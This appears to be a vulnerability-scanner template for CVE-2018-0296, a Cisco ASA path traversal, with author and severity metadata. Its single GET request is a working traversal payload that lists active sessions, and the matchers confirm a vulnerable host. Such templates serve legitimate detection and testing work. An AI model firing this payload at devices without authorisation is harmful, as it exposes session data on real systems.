id: CVE-2018-0296 info: name: Cisco ASA path traversal vulnerability author: organiccrap severity: medium tags: cve,cve2018,cisco,lfi reference: https://github.com/yassineaboukir/CVE-2018-0296 requests: - method: GET path: - "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" matchers-condition: and matchers: - type: word words: - "///sessions" part: body - type: status status: - 200